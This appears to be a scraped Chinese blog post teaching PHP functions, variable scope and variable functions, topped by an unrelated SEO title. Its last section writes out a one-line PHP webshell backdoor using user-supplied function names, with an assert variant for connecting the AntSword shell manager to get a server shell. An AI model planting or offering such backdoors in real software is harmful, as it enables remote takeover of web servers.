当前位置：首页 > news >正文

武汉计算机培训机构湘潭关键词优化公司

news 2025/8/1 3:11:02

武汉计算机培训机构,湘潭关键词优化公司,如何做一个网页项目,怎样做网站的轮播图片函数基本结构语法结构 function 函数名(形式参数1,形式参数2...){//函数体return 返回值 }定义并执行一个简单函数 // funtion.phpfunction test(){echo "This is function ".__FUNCTION__; }test();函数传参 // function.phpfunction add($x, $y){$sum $x …

函数

基本结构

语法结构

function 函数名(形式参数1,形式参数2...){//函数体return 返回值
}

定义并执行一个简单函数

// funtion.phpfunction test(){echo "This is function ".__FUNCTION__;
}test();

函数传参

// function.phpfunction add($x, $y){$sum = $x + $y;return $sum;
}echo add(10, 3);

函数调用

函数的调用，函数名加上小括号

调用过程

function a(){echo "This is func ".__FUNCTION__."<br />";
}function b(){echo __FUNCTION__." is starting...<br />";a();echo __FUNCTION__." is stopped!<br />";
}b();

注意

函数的调用，直接函数名字后面加上() 即可，() 可以看作是运算符；
调用函数之后执行的过程是相对独立的，互不干扰，默认没有联系；
函数执行完毕，返回调用的位置继续向下执行。

变量

范围

局部变量
全局变量
超全局变量

函数内部无法直接获取函数外部的变量

函数外部无法直接获取函数内部的变量

局部变量

在函数内部定义的变量，默认情况下，函数外部不能直接访问函数内部定义的变量。

// function.phpfunction get_name(){$username = "GJL";echo "My name is {$username}";
}
get_name();echo $username;     // Notice: Undefined variable: username

全局变量

全局变量是在脚本中，函数或类的外部定义的变量。

// function.php$username = "GJL";function get_name(){echo "My name is {$username}";
}get_name();     // Notice: Undefined variable: username

注意

PHP 语言中，函数内部是没有办法直接调用函数外部的变量，这一点与 JavaScript 和 Python 不同。

解决方式

函数传参

$username = "GJL";function get_name($username){echo "My name is {$username}";
}get_name($username);

global 声明全局变量

// function.php$username = "GJL";function get_name(){global $username;echo "My name is {$username}";
}get_name();

参数传递

按值传参

默认传参方式。

function add($x, $y){$sum = $x + $y;return $sum;
}echo add(10, 3);

对形参的操作，不会改变实参的值。

默认参数

可以给形式参数设置默认值，直接赋值即可

给函数默认值的时候，全都给

function add($x = 0, $y = 0){$sum = $x + $y;return $sum;
}// echo add();          // 0
// echo add(10, 3);     // 13
echo add(10);           // 10

可变函数

概述

可变函数也叫变量函数，动态函数，函数名可以动态设置和调用，变量()。这是PHP 特性之一，这种特性通常会被攻击者所利用。

直接把函数名赋值给变量，通过修改变量的值，可以实现动态调用。PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号，PHP 将寻找与变量的值同名的函数，并且尝试执行它。

<?phpfunction a(){echo "This is function a";
}
function b(){echo "This is function b";
}
$func_name = "a";
$func_name();  // 相当于 a();
// 可以直接使用变量的值充当函数名
// 执行结果，输出 This is function a?>

危险操作

<?phpfunction a(){echo "This is function a";
}function b(){echo "This is function b";
}// a();
// b();$func_name  = ($_GET['func_name']);
$func_name();                   // a();// b();// phpinfo();?>

直接访问显示错误，此时的 func_name 为空

传参，赋予其参数

修改 GET 中传入的参数

将参数名改为 phpinfo 则调用 phponfo() 函数显示 phpinfo

简单的后门

命令执行

php 中 system() 函数可以直接执行系统命令

如
```
system("ipconfig");
```
在 php 中写入最简单的后门函数
```
<?php$_GET['a']($_GET['b']);?>
```
访问此 php 页面

修改传参，成功执行命令

蚁剑连接

eval 为一种语言结构，而非函数，不能动态调用
可以将 assert 当作 a 的参数，b 的参数为一句话木马，连接蚁剑
- 蚁剑为 POST 传参，需要将传参方式设置为 $_POST 或 $_REQUEST
```
<pre>
<?php$_GET['a']($_REQUEST['b']);?>
```
蚁剑连接

输入传参后的 url

注意

assert 一次只能传递一个参数，传递多个参数时需要对传参进行编码

连接密码为 $_REQUEST['b'] 中的 b
获取 shell